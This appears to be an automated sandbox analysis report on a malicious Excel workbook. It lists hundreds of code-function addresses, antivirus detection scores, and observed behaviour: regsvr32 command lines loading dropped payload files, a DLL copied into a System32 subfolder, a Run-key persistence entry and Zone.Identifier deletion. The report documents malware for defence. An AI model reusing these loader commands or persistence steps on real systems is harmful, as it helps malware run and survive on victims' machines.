Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180004918 9_2_0000000180004918
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001531C 9_2_000000018001531C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000A31C 9_2_000000018000A31C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180020D20 9_2_0000000180020D20
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000E720 9_2_000000018000E720
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001A524 9_2_000000018001A524
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000D52C 9_2_000000018000D52C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180024F30 9_2_0000000180024F30
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000C930 9_2_000000018000C930
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180025938 9_2_0000000180025938
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000F138 9_2_000000018000F138
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000E93C 9_2_000000018000E93C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180027344 9_2_0000000180027344
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180001744 9_2_0000000180001744
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001D150 9_2_000000018001D150
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180004B50 9_2_0000000180004B50
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180010D54 9_2_0000000180010D54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180022158 9_2_0000000180022158
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180015958 9_2_0000000180015958
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002B55C 9_2_000000018002B55C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180029360 9_2_0000000180029360
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180018764 9_2_0000000180018764
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180028768 9_2_0000000180028768
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017B68 9_2_0000000180017B68
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001A170 9_2_000000018001A170
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180004D70 9_2_0000000180004D70
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180003970 9_2_0000000180003970
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180010F74 9_2_0000000180010F74
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180018F80 9_2_0000000180018F80
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180024D84 9_2_0000000180024D84
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002A784 9_2_000000018002A784
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180016F84 9_2_0000000180016F84
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002358C 9_2_000000018002358C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180028F8C 9_2_0000000180028F8C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180029590 9_2_0000000180029590
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180021594 9_2_0000000180021594
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180011194 9_2_0000000180011194
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180029198 9_2_0000000180029198
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000A198 9_2_000000018000A198
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002539C 9_2_000000018002539C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800033A8 9_2_00000001800033A8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800247AC 9_2_00000001800247AC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800233B0 9_2_00000001800233B0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180027DB8 9_2_0000000180027DB8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800243B8 9_2_00000001800243B8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800027B8 9_2_00000001800027B8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180026FBC 9_2_0000000180026FBC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006BBC 9_2_0000000180006BBC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001B5C4 9_2_000000018001B5C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800031C4 9_2_00000001800031C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180012FC8 9_2_0000000180012FC8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001FFD8 9_2_000000018001FFD8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001FBD8 9_2_000000018001FBD8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800117E0 9_2_00000001800117E0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000C1E0 9_2_000000018000C1E0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00130000 10_2_00130000
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180025C1C 10_2_0000000180025C1C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180019C4C 10_2_0000000180019C4C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180015E70 10_2_0000000180015E70
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002AC7C 10_2_000000018002AC7C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000DC7C 10_2_000000018000DC7C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180008688 10_2_0000000180008688
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800078B4 10_2_00000001800078B4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800058C0 10_2_00000001800058C0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800018F0 10_2_00000001800018F0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800132FC 10_2_00000001800132FC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180009D2C 10_2_0000000180009D2C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180022334 10_2_0000000180022334
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180002D54 10_2_0000000180002D54
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180003B78 10_2_0000000180003B78
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001A788 10_2_000000018001A788
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001D5B0 10_2_000000018001D5B0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800143B4 10_2_00000001800143B4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001FDF4 10_2_000000018001FDF4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800043F4 10_2_00000001800043F4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000C3F4 10_2_000000018000C3F4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001D7F8 10_2_000000018001D7F8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001DC00 10_2_000000018001DC00
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000C800 10_2_000000018000C800
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001EC08 10_2_000000018001EC08
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000F60C 10_2_000000018000F60C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002B814 10_2_000000018002B814
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180007418 10_2_0000000180007418
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001E61C 10_2_000000018001E61C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000421C 10_2_000000018000421C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180007620 10_2_0000000180007620
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000BE20 10_2_000000018000BE20
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180017824 10_2_0000000180017824
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180003824 10_2_0000000180003824
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180023228 10_2_0000000180023228
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180010628 10_2_0000000180010628
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001DE2C 10_2_000000018001DE2C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000A42C 10_2_000000018000A42C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000E42C 10_2_000000018000E42C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001CA34 10_2_000000018001CA34
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001DA34 10_2_000000018001DA34
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180028C38 10_2_0000000180028C38
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001EA38 10_2_000000018001EA38
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002803C 10_2_000000018002803C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002B23C 10_2_000000018002B23C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180011C3C 10_2_0000000180011C3C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180023840 10_2_0000000180023840
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002A244 10_2_000000018002A244
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180027448 10_2_0000000180027448
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180023E4C 10_2_0000000180023E4C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180001650 10_2_0000000180001650
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000D250 10_2_000000018000D250
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001B058 10_2_000000018001B058
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002765C 10_2_000000018002765C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000145C 10_2_000000018000145C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000EE5C 10_2_000000018000EE5C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180013A60 10_2_0000000180013A60
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180027A68 10_2_0000000180027A68
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180002A6C 10_2_0000000180002A6C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002AA74 10_2_000000018002AA74
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180014274 10_2_0000000180014274
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180017E74 10_2_0000000180017E74
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000D87C 10_2_000000018000D87C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180002480 10_2_0000000180002480
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000FE84 10_2_000000018000FE84
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180020490 10_2_0000000180020490
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180029094 10_2_0000000180029094
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800098AC 10_2_00000001800098AC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800164B0 10_2_00000001800164B0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800168B0 10_2_00000001800168B0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180026AB8 10_2_0000000180026AB8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800184BC 10_2_00000001800184BC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800190BC 10_2_00000001800190BC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800056BC 10_2_00000001800056BC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002B6C0 10_2_000000018002B6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180017CC0 10_2_0000000180017CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180009AC0 10_2_0000000180009AC0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002B0C4 10_2_000000018002B0C4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001C6CC 10_2_000000018001C6CC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800072CC 10_2_00000001800072CC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180026CD0 10_2_0000000180026CD0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180020ED4 10_2_0000000180020ED4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000BCD8 10_2_000000018000BCD8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800116DC 10_2_00000001800116DC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180006ADC 10_2_0000000180006ADC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800114E0 10_2_00000001800114E0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800166E8 10_2_00000001800166E8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800154EC 10_2_00000001800154EC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800040EC 10_2_00000001800040EC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800012F0 10_2_00000001800012F0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800288F8 10_2_00000001800288F8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800036FC 10_2_00000001800036FC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001FD00 10_2_000000018001FD00
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000D704 10_2_000000018000D704
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000FB04 10_2_000000018000FB04
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001E30C 10_2_000000018001E30C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180015714 10_2_0000000180015714
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002A518 10_2_000000018002A518
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180021918 10_2_0000000180021918
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180004918 10_2_0000000180004918
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001531C 10_2_000000018001531C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000A31C 10_2_000000018000A31C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180020D20 10_2_0000000180020D20
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000E720 10_2_000000018000E720
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001A524 10_2_000000018001A524
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000D52C 10_2_000000018000D52C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180024F30 10_2_0000000180024F30
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000C930 10_2_000000018000C930
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180025938 10_2_0000000180025938
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000F138 10_2_000000018000F138
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000E93C 10_2_000000018000E93C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180027344 10_2_0000000180027344
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180001744 10_2_0000000180001744
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001D150 10_2_000000018001D150
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180004B50 10_2_0000000180004B50
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180010D54 10_2_0000000180010D54
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180022158 10_2_0000000180022158
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180015958 10_2_0000000180015958
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002B55C 10_2_000000018002B55C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180029360 10_2_0000000180029360
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180018764 10_2_0000000180018764
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180028768 10_2_0000000180028768
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180017B68 10_2_0000000180017B68
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001A170 10_2_000000018001A170
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180003970 10_2_0000000180003970
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180004D70 10_2_0000000180004D70
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180010F74 10_2_0000000180010F74
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180018F80 10_2_0000000180018F80
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180024D84 10_2_0000000180024D84
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002A784 10_2_000000018002A784
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180016F84 10_2_0000000180016F84
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002358C 10_2_000000018002358C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180028F8C 10_2_0000000180028F8C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180029590 10_2_0000000180029590
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180021594 10_2_0000000180021594
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180011194 10_2_0000000180011194
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180029198 10_2_0000000180029198
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000A198 10_2_000000018000A198
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018002539C 10_2_000000018002539C
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800033A8 10_2_00000001800033A8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800247AC 10_2_00000001800247AC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800233B0 10_2_00000001800233B0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800243B8 10_2_00000001800243B8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180027DB8 10_2_0000000180027DB8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800027B8 10_2_00000001800027B8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180026FBC 10_2_0000000180026FBC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180006BBC 10_2_0000000180006BBC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001B5C4 10_2_000000018001B5C4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800031C4 10_2_00000001800031C4
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180012FC8 10_2_0000000180012FC8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001FFD8 10_2_000000018001FFD8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018001FBD8 10_2_000000018001FBD8
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800117E0 10_2_00000001800117E0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000C1E0 10_2_000000018000C1E0
Source: 4470_02112022.xls Macro extractor: Sheet name: Sheet6
Source: 4470_02112022.xls Macro extractor: Sheet name: Sheet6
Source: 4470_02112022.xls ReversingLabs: Detection: 80%
Source: 4470_02112022.xls Virustotal: Detection: 67%
Source: 4470_02112022.xls Metadefender: Detection: 31%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HC8X1KC5.txt Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5927.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@12/10@4/50
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 4470_02112022.xls OLE indicator, Workbook stream: true
Source: 4470_02112022.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180009D2C CloseHandle,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW, 9_2_0000000180009D2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1001B1B0 FindResourceA,LoadResource,LockResource,FreeResource, 8_2_1001B1B0
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 4470_02112022.xls Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006870 push ebp; iretd 8_2_00000001800068C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180009097 push ebp; iretd 8_2_0000000180009098
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800230F3 push ebp; iretd 8_2_00000001800230F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006957 push ebp; iretd 8_2_0000000180006958
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006212 push ebp; iretd 8_2_0000000180006213
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008A56 push ebp; iretd 8_2_0000000180008A57
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005A82 push ebp; iretd 8_2_0000000180005A83
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006415 push ebp; retf 8_2_0000000180006416
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800224FA push ebp; ret 8_2_00000001800224FB
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008D61 push ebp; iretd 8_2_0000000180008D62
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000658C push ebp; iretd 8_2_000000018000658D
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008E30 push ebp; iretd 8_2_0000000180008E31
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006633 push ebp; retf 8_2_0000000180006634
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006738 push 45C7D274h; iretd 8_2_000000018000673E
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008F44 push ebp; iretd 8_2_0000000180008F45
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006212 push ebp; iretd 9_2_0000000180006213
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006870 push ebp; iretd 9_2_00000001800068C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006738 push 45C7D274h; iretd 9_2_000000018000673E
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress, 8_2_10014064
Source: oxnv4.ooccxx.0.dr Static PE information: real checksum: 0xc56a8 should be: 0xc2343
Source: 40hd04O0[1].dll.0.dr Static PE information: real checksum: 0xc56a8 should be: 0xc2343
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\oxnv4.ooccxx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\oxnv4.ooccxx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\oxnv4.ooccxx Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FatGkw.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\oxnv4.ooccxx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FatGkw.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FatGkw.dll Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10020690 IsWindowVisible,IsIconic, 8_2_10020690
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10010AE4 IsIconic,GetWindowPlacement,GetWindowRect, 8_2_10010AE4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
